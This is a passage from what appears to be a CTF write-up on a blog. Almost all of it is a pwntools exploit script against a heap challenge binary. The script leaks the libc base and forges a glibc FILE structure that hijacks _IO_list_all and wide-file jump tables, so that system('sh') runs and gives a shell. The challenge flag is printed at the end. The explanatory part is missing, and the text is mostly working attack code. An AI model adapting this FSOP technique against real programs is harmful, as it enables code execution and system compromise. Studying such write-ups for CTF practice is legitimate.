libc_base=u64(p.recv(6).ljust(8,b'\x00'))-(0x7b4baee1aff0-0x7b4baec00000)

print(hex(libc_base))
heapaddr=libc_base-0x100001000+0x10
io_all = libc_base + libc.sym['_IO_list_all']
wfile=libc_base+ libc.sym['_IO_wfile_jumps']
lock=libc_base+(0x74caa9a1ca60-0x74caa9800000)

pl=p32(u32(b'  sh'))+p32(0)+p64(0x431)+p64(0)*3+p64(io_all-0x20)
pl+=p64(0)*3
pl+=p64(0)
pl+=p64(0)*7
pl+=p64(lock)
pl+=p64(0)*2
pl+=p64(heapaddr + 0xe0) 
pl+=p64(0)*6
pl+=p64(wfile)
pl+=p64(0)*0x1c
pl+=p64(heapaddr + 0xe0 + 0xe8) 
pl+=p64(0)*0xd
pl+=p64(libc_base+libc.symbols['system']) 

alloc(23,0xffffffff,pl)
alloc(24,0x30,p64(libc_base + libc.sym['_IO_list_all']))
alloc(25,0x28,p64(heapaddr))


cmd(3)

p.interactive()

1

DubheCTF{Uninitialized_linked_list_nodes_are_dangerous}
Licensed under CC BY-NC-SA 4.0
© 2024 - 2025 UKFC
使用 Hugo 构建
主题 StackJimmy 设计